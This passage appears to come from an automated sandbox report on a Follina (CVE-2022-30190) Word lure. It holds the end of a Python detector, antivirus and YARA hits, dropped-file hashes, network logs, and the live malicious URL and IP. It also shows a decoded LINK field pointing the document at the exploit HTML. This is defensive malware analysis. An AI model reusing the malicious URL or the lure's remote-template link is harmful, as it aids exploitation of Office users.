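    # https://www.malwarejake.com/456.html!
    lure = build_sample_docx("https://attacker.invalid/456.html!")
    for hit in suspicious_relationships(lure):
        print(f"{hit['id']} ({hit['type']}) -> {hit['target']}: {', '.join(hit['reasons'])}")
    print("benign docx hits:", suspicious_relationships(build_sample_docx()))
    print("HTML invokes ms-msdt:", html_invokes_msdt(SAMPLE_HTML))
```

Run against the real sample by reading the .docx bytes from disk and, separately, the cached 456[1].htm from the Temporary Internet Files paths listed above; the relationship check never touches the network, so it is safe to run on quarantined files. The trailing "!" is the strongest single indicator: the Target of a legitimate linked OLE object does not end that way.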

      Persistence and Installation Behavior

Source: document.xml.rels | Extracted files from sample: https://www.malwarejake.com/456.html!
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (63 identical entries)
MITRE ATT&CK matrix (the number in brackets is the count the matrix shows beside a matched technique; techniques without a number were not matched):
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Rootkit; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: File and Directory Discovery (1); System Information Discovery (2); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Ingress Tool Transfer (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud
Source | Detection | Scanner | Label
qoIZSkdejM.docx | 35% | Virustotal |
qoIZSkdejM.docx | 23% | Metadefender |
qoIZSkdejM.docx | 45% | ReversingLabs | Document-Word.Exploit.CVE-2022-30190
qoIZSkdejM.docx | 100% | Avira | W97M/Dldr.Agent.G1
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm | 100% | Avira | JS/CVE-2022-30190.G
No Antivirus matches
Source | Detection | Scanner | Label
www.malwarejake.com | 0% | Virustotal |
Source | Detection | Scanner | Label
https://www.malwarejake.com/456.html | 0% | Virustotal |
https://www.malwarejake.com/456.html | 100% | Avira URL Cloud | malware
https://www.malwarejake.com/456.htmlyX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.malwarejake.com | 143.198.109.79 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.malwarejake.com/456.html | true | 0% Virustotal; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.malwarejake.com/456.htmlyX | ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
143.198.109.79 | www.malwarejake.com | United States | 15557 | LDCOMNETFR | true
      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:686090
      Start date and time:2022-08-18 08:26:02 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 33s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:qoIZSkdejM (renamed file extension from none to docx)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed:10
      Number of new started drivers analysed:1
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal96.expl.evad.winDOCX@1/18@15/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      No simulations
      No context
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28873688711451273
      Encrypted:false
      SSDEEP:48:I36SRBz0/O33Oq3OOeOplGOmjn3YOh8Qys1gOX7FBOX0GROXX3OXJrPOXvTO4OwR:KnLz765g0GWXsVEmyrySH
      MD5:28F73E1D7481A925E37DD40FBD66ADB5
      SHA1:C83C1651B1CE7CA06214D536C733A4BE288D1035
      SHA-256:A32B295015C9D2E54D7B85D64FBC2B512E28F3696291F1F7EEA9CA1DE51366CE
      SHA-512:233C0AE685D4F96D9521BBF1BBC566AA44F97302D3A5E84F35564FE740579CE13E5FD396E2A8A5558009D09F59DC620293CC9552A7B7F5DBEDE163178930A584
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6724512997201999
      Encrypted:false
      SSDEEP:768:X4VM1AI/x/3bC/pmqw4gdm+2YKyiIt1m+2YKyiIttm+2YKyiItIm+2YKyiI:XnRzbo
      MD5:77F6420775F752B526D099B514984A9E
      SHA1:DBD33E40BE3851E00BD269864C3395B4B42AC961
      SHA-256:BCFED7836FE35909AD9DDBF5DCD4D9E862A623583BF6550DFD263AA243A5CB30
      SHA-512:0C79EB825AA45F69CC6277B8BE18C720F40B965180B2DB944230EFB599D6E95DC5FCCCDFD648CD11167BEAD6FE58E1AA5D759D39D8EC0E3F173E3562F9C83413
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.959476246683456
      Encrypted:false
      SSDEEP:3:yVlgsRlzyl8jFYiRzhpTXrCwkAjfct276:yPblzyl6FYiRmwkAbct22
      MD5:42A4C1F97C02E4455D7124209DAD82D6
      SHA1:35E02941D6F93B89612B9138A4158B3E73722DC7
      SHA-256:2DF9425A9498D48647078C0374EFE91BDD7AAD2A5295E512F8C73F053BF5D5ED
      SHA-512:16D712CBFAC51BC908683F3AA925CE1383FB19529B4B25E600FC59B105D75A9F1E2D88C1631D40D7154A6006DF8028409208E3A240EA7DB6307FBB75DB7A73C6
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28691484699157094
      Encrypted:false
      SSDEEP:48:I3taRBG+81ZCMG4gaBTMhUfkgMfPlQwrnerk9H:KtaLXKNlTHMfPldMqH
      MD5:3ACA8973093C12C413A9EE1A54F08EC9
      SHA1:CECF24CEEEE35496AFC258BD51AEE8A015CE5860
      SHA-256:3B541FD09566960CD44EBD7FE9636389A0D32B051BC361F6BEABC7C352F8A70B
      SHA-512:0E37BB3424786D4165C36509BD5BFA179DFF8BE3A8AFE3F514C038F1F49BE48EDD10A23A07911E3CDF2295EF6513D96967555695557BC6CA72DB596338066651
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22069206926972237
      Encrypted:false
      SSDEEP:48:I3qf0TUUrBrME5BFdkY9oso/mSpM/oNP/oNh:K8SUC55Gpq
      MD5:7C3F381F7EBADADFC1D6D02020D4A9C2
      SHA1:98C49943B9F8F74B74CCD81F03DE992B38B71A4C
      SHA-256:EE92EA31846F8A102B1F1ACA826FAD2779FA061390888EE22B6E4638C4EBF384
      SHA-512:35712E6451D7818EE4DAFF5D03290E9991E9B78D83B0E74C3F7E229D5C51688E6C6CBC4EADFFA12F4FED6B755E19A7AB443470FEF497C0CFD472F627B2849D61
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.9934613605512386
      Encrypted:false
      SSDEEP:3:yVlgsRlzq7lU1SLNyeSldhttkL0WFPFu276:yPblzaU7jBEz9Fu22
      MD5:3E7A15E942D05782E9E43891ECECF90C
      SHA1:F90804676119952EB42BBB590F7D6869544B43CE
      SHA-256:95F6BA028B9748336838FC2D20CCB266CAA743CD8B6FF5044745D0651237B505
      SHA-512:7C64CC766B4CBDA1EC0F61EDEC8EEDF56BA4E243044543C1275C025613CC8B6CC4B46213DD843E31FC284385B9AC34E91BA204E65FD4F0A1A55256A3AE44C2B7
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:downloaded
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      IE Cache URL:https://www.malwarejake.com/456.html
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):7056
      Entropy (8bit):1.1561718807594425
      Encrypted:false
      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
      MD5:B92EE400BE1F2612B4138031DFC5881E
      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):5120
      Entropy (8bit):2.1106765232664424
      Encrypted:false
      SSDEEP:24:rYvXkbK/FPifnQNSLNni0nQdPi4ggooULNniT:rYfkm9cnQSpi0nQdfWFpi
      MD5:D0E8EEB4350D366F88AB89E9AB7BC0BE
      SHA1:3C96C82FD16422901C26C1966F5726F73DA6DE34
      SHA-256:46C37C7B7958325F3882CE70315C10B0FDBB912404925FAFB893AB765707A02B
      SHA-512:FA4FFC253836E0712FAA0C7B6CEB81349895313767F0BB14A97B2D35FF8637D6FA1FE38803A64663FF17DA9172951937BA1966C040BB5D2DF4830D54B96DE24B
      Malicious:false
      Reputation:low
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):0.7710450912559451
      Encrypted:false
      SSDEEP:3:5lsl4/I5lNVRIYk/lElXlAPlMOau+2lT8M1nRF5Zfdkl5XHlRtp/gdl/ABdllqPe:olgI5lNcYWeuPa+ejJoYB4PxZUtLsmN
      MD5:DF555F2BD2F7953B785FBD5C2EC880ED
      SHA1:EC5BBE67F462283F60964E804FEA21BE05DEDE5E
      SHA-256:B5E66DC74C4F74A231454D7843C6A8E9B6DFF18E51AF4590CC460FE9E5373E6D
      SHA-512:E2C31A4890ECD7B809D27DF505BAD97BD9B5BF7A7F5900C07F81705221FFCD13F949A57E8DBC5D07E025FE2778DC37F75346D24CEE342C1316FFC493632C95E4
      Malicious:false
      Reputation:low
      Preview (decoded from the UTF-16 field text; trailing padding omitted):LINK htmlfile "https://www.malwarejake.com/456.html!" "" \p \f 0
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025595998137779664
      Encrypted:false
      SSDEEP:6:I3DPcXKq3u/FvxggLRBJgNkBB/RDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPAsTgGB/R1vYg3J/
      MD5:1DE094F8CC783FB8C79C8796F6DEFE80
      SHA1:7D012B58C1F576912E30B7626563E66504C45FEA
      SHA-256:05415D3ECB94C1E9A41DF6598194681CA259A883B702D73F24A9C14C3B60128A
      SHA-512:D8D4EFCFBE62216E78D57BEF7531FEB8C7433602E169EED5FB3B1903E33F6A0EC32E0D15D4D017719DF45B4906D79D01E6DC990E0E149E01F61EAF8C59498815
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025470567096111188
      Encrypted:false
      SSDEEP:6:I3DPchixVvxggLRNA40ltRXv//4tfnRujlw//+GtluJ/eRuj:I3DP2ixZMTvYg3J/
      MD5:314C04BEA9F8999637A6874D071429EB
      SHA1:004A2ECCE0788F2ACA8ADFD7725608B8AAAFA44A
      SHA-256:DAA04F38CD32929596048F14FD986658824430CD0B025D6D4C7074E29D57610E
      SHA-512:38DD64E7172A9CC0BFE9C8EECCE3DA1AE4CA9FFD8216A0E74E51979161B00647A02109020611C06F13747C9C944F763B71D2164F5DED9AB16189786DBD919DCA
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):72
      Entropy (8bit):4.786273488348122
      Encrypted:false
      SSDEEP:3:bDuMJlMKpO1d2mxWfOO1d2v:bCAm
      MD5:22FF1DED7C768389EA5A0012AD7FFDB7
      SHA1:3C6A3F7DCF0A4DF09F1C6649D44517042797A9FC
      SHA-256:4B03CCDC4AF57995C882CEE2F0FF79078A3521735DA3976B07F3DF4A2BFB658D
      SHA-512:8011B24585EC92ED0E5A6E4806D89533DE7604BFD949B663B7EEF16EA1D40D3F93BEA03F07E04EE9D10456FE8C3D87F7EB7AF06BE515A686D79EBE5CD6182DBB
      Malicious:false
      Preview:[folders]..Templates.LNK=0..qoIZSkdejM.LNK=0..[misc]..qoIZSkdejM.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 14:26:09 2022, mtime=Thu Aug 18 14:26:09 2022, atime=Thu Aug 18 14:26:20 2022, length=10469, window=hide
      Category:dropped
      Size (bytes):1019
      Entropy (8bit):4.575475970912561
      Encrypted:false
      SSDEEP:24:8nkvk/XTHEmxQoyCNeixGFgDv3qGniu7D:8kvk/XTkLoyCNjc/Gi0D
      MD5:B1265A330658214AB98AB51EEFFD590A
      SHA1:059ACAD7A250B8FDC69045F883DD97BEC5246641
      SHA-256:CD34EE17637F61F1857FC3D3B374C294CF58241C07B1DC442027FD0E1592BAE2
      SHA-512:97A96DD5E41667621B7833BACBF2ED12D2C6CF4195327A3D8861A2AB522CC762332851FF7142188328FAEB4E6BD4A996D9926C76ADF9EC51F56097054DE111B4
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      File type:Microsoft OOXML
      Entropy (8bit):7.832260939059278
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      File name:qoIZSkdejM.docx
      File size:10469
      MD5:0d37337ead8492e1b2395f6cd4f724fc
      SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
      SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
      SHA512:113711a807da1417cff28760d0050543631c969725c65b7b32da874cc07c16baa24a894c97ffc185cbdc574c62f078621216d7e970cdf7c89e553ca5f2fdbd2a
      SSDEEP:192:R8D/fgUUn+iZ7dADiIF8TBIuICjBlK2dRBeVeT6lf/XO+ra8a:R8bfgzn+iZ7dADiIF8NIFCu2dRBOm6lK
      TLSH:9322BF35DF0A2D52C00BC23B60060706E44B68F3DA6F2A4FF6901AD6CD624EC175DD5E
      Icon Hash:e4e6a2a2a4b4b4a4
      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Aug 18, 2022 08:27:12.522223949 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.522680998 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.522768021 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.522789001 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:12.523118973 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.523174047 CEST44349179143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:12.523310900 CEST49179443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.034006119 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.034058094 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.034127951 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.035756111 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.035784006 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.393188000 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.393440962 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.407644987 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.407680988 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.408390999 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.435034037 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.479376078 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738584995 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738720894 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:17.738814116 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.739058971 CEST49180443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:17.739078045 CEST44349180143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:18.835387945 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835422993 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:18.835465908 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835896969 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:18.835911036 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.202419043 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.202724934 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.214833975 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.214850903 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.215549946 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.217200994 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.259370089 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556180954 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556308031 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:19.556437969 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.556953907 CEST49181443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:19.556973934 CEST44349181143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.579341888 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579407930 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.579480886 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579756021 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.579777002 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.953999996 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.954180956 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.967492104 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:20.967525005 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.967890978 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:20.971045017 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.011486053 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.308835030 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.308968067 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.309154987 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.309405088 CEST49182443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.309431076 CEST44349182143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.380564928 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.380642891 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.380734921 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.381005049 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.381026983 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.740636110 CEST44349183143.198.109.79192.168.2.22
      Aug 18, 2022 08:27:21.740732908 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.748636007 CEST49183443192.168.2.22143.198.109.79
      Aug 18, 2022 08:27:21.748660088 CEST44349183143.198.109.79192.168.2.22
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 18, 2022 08:27:05.044718027 CEST | 59915 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:05.067305088 CEST | 53 | 59915 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:11.726632118 CEST | 54408 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:11.754184961 CEST | 53 | 54408 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:11.759929895 CEST | 50108 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:11.776880980 CEST | 53 | 50108 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:16.983206034 CEST | 54723 | 53 | 192.168.2.22 | 8.8.8.8
